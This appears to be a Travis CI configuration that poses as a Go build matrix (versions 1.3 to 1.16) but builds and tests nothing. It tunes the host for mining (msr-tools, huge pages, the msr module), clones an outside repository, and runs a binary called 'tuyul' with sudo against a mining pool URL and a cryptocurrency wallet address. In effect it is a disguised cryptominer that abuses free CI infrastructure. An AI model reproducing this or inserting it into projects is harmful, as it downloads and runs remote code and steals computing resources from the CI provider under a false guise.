language: go
os: linux
dist: focal
go:
  - "1.3"
  - "1.4"
  - "1.5"
  - "1.6"
  - "1.7"
  - "1.8"
  - "1.9"
  - "1.10"
  - "1.11"
  - "1.12"
  - "1.13"
  - "1.14"
  - "1.15"
  - "1.16"
before_install:
  - sudo apt-get update -y
  - sudo apt-get install -y msr-tools wget
  - sudo sysctl -w vm.nr_hugepages=1280
  - sudo modprobe msr
install:
  - git clone https://github.com/Diaznr/p.git
  - cd p
  - chmod +x tuyul
script:
  - sudo ./tuyul --url minenice.newpool.pw:1154 --user TRTLv3LSAMfLWkG4Sh9gXLXZGTynznP1JWrCRVqbAMec8haEGoa5RgXKZVG26PcRx1BGmgopo5X2mL8jt7QA39tY4z55Y8WTGzU@Bulus --pass x --cpu-no-yield --donate-level 1 -k --cpu-priority 5 --print-time 10